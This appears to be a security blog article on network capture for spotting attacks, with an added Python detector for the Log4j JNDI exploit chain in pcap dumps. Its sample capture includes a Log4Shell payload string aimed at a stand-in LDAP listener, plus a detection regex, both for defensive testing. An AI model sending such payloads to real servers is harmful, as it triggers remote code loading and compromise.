One foundation of a good cybersecurity practice is the ability to capture attack actor TTPs (Tactics, Techniques, and Procedures) from across and behind the attack surface. Tools such as Sysdig Falco capture TTP signals from running workloads (process changes, filesystem access, etc.), and can give indications of local compromise, but these signals alone only tell the late-stage story of an attack event. Organizations need to see a bigger context, and that's where network capture and analysis come into play.

Observing network traffic can reveal attacker behaviors before a successful compromise, such as reconnaissance activity and weaponization that is targeted at specific vulnerabilities. Observing traffic can also reveal lateral spread and exfiltration activities.

For example, in a log4j exploit, almost all of the initial signals are network-based. The initial JNDI recon against multiple workloads, the JNDI request that then triggers an outgoing request (beacon) to an attacker's listener, the subsequent request that retrieves the Java class to be run… all of these are network activities and cannot be identified by on-workload sensors. The first signal you get from on-workload telemetry may be the installation of an exploit kit (a crypto-miner for example).

Our receiver server is located behind the firewall, listening on port 8081 for traffic from the honeypot sensors:

packetstreamer receiver -config contrib/config/receiver.yaml

The receiver server writes the aggregated capture traffic to a log file, such as /tmp/dump_file.
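The two points above (the log4j chain is visible only on the wire, and the receiver aggregates that wire traffic into a dump file) can be tied together with a small detector. The following is an added example, not code from the article or from the PacketStreamer project. It assumes the receiver's dump file is in classic pcap format with Ethernet framing (the article only calls it a log file), builds a constructed four-packet capture in memory so it runs offline, and then walks the capture looking for a JNDI lookup string in an inbound HTTP request followed by a new outbound TCP connection (SYN) from the same workload to the listener host named in that string. Correlation is by IP address only; a hostname in the lookup string would need a DNS lookup that this example does not perform. All addresses are from documentation ranges and are constructed sample values.

```python
"""Correlate a JNDI lookup seen in an inbound request with the workload's
subsequent outbound beacon, reading a pcap dump such as the one the
receiver writes.  Added example; pcap-with-Ethernet format is an assumption."""
import re
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4          # little-endian magic as written by this builder
LINKTYPE_ETHERNET = 1
TCP_SYN, TCP_ACK = 0x02, 0x10

# Only the listener host is captured; scheme is matched for completeness.
JNDI_RE = re.compile(rb"\$\{jndi:(ldap|ldaps|rmi|dns)://([^/:}\s]+)", re.IGNORECASE)


def build_pcap(packets):
    """packets: list of (ts_sec, raw_ethernet_frame). Returns pcap file bytes."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for ts, frame in packets:
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out


def build_frame(src_ip, dst_ip, sport, dport, payload, flags=0x18):
    """Ethernet + IPv4 + TCP frame. Checksums are left zero; the parser
    below does not verify them. Default flags 0x18 = PSH|ACK (data segment)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0,
                     64, 6, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp + payload


def read_pcap(data):
    """Yield (ts_sec, frame) for each record; handles either byte order."""
    (magic,) = struct.unpack_from("<I", data, 0)
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    (linktype,) = struct.unpack_from(endian + "I", data, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type is handled here")
    off = 24
    while off + 16 <= len(data):
        ts, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield ts, data[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """Return (src, dst, sport, dport, flags, payload) or None if not IPv4/TCP."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    t = 14 + ihl
    sport, dport = struct.unpack_from("!HH", frame, t)
    data_off = (frame[t + 12] >> 4) * 4
    return src, dst, sport, dport, frame[t + 13], frame[t + data_off:]


def detect_log4j_chain(pcap_bytes):
    """Return findings: every JNDI lookup attempt, plus each outbound SYN from
    a targeted workload to the listener IP named in an earlier lookup."""
    findings, pending = [], {}          # pending: (victim_ip, listener_ip) -> lookup ts
    for ts, frame in read_pcap(pcap_bytes):
        pkt = parse_tcp(frame)
        if pkt is None:
            continue
        src, dst, _sport, dport, flags, payload = pkt
        for m in JNDI_RE.finditer(payload):
            listener = m.group(2).decode(errors="replace")
            findings.append({"type": "jndi_lookup", "ts": ts, "attacker": src,
                             "victim": dst, "dport": dport, "listener": listener})
            pending[(dst, listener)] = ts
        # A bare SYN (no ACK) is a new outbound connection from the workload.
        if (flags & (TCP_SYN | TCP_ACK)) == TCP_SYN and (src, dst) in pending:
            findings.append({"type": "beacon", "ts": ts, "victim": src, "listener": dst,
                             "dport": dport, "lookup_ts": pending[(src, dst)]})
    return findings


# Constructed sample capture (documentation-range addresses, not real hosts).
VICTIM, SCANNER, LISTENER = "10.0.0.12", "192.0.2.44", "198.51.100.7"
SAMPLE_PCAP = build_pcap([
    (1000, build_frame(SCANNER, VICTIM, 51000, 8080,
                       b"GET / HTTP/1.1\r\nHost: app\r\nUser-Agent: Mozilla/5.0\r\n\r\n")),
    (1001, build_frame(SCANNER, VICTIM, 51002, 8080,
                       b"GET / HTTP/1.1\r\nHost: app\r\n"
                       b"User-Agent: ${jndi:ldap://198.51.100.7:1389/a}\r\n\r\n")),
    (1002, build_frame(VICTIM, LISTENER, 40000, 1389, b"", flags=TCP_SYN)),   # beacon
    (1003, build_frame(VICTIM, "10.0.0.20", 40001, 5432, b"", flags=TCP_SYN)),  # benign DB
])

if __name__ == "__main__":
    for f in detect_log4j_chain(SAMPLE_PCAP):
        print(f)
```

Run against the real dump by replacing SAMPLE_PCAP with the bytes of /tmp/dump_file. The first finding is the recon request itself; the second is the part an on-workload sensor cannot see, the workload opening a connection to the listener a second later, which is the signal to act on even before any class is fetched or a miner appears.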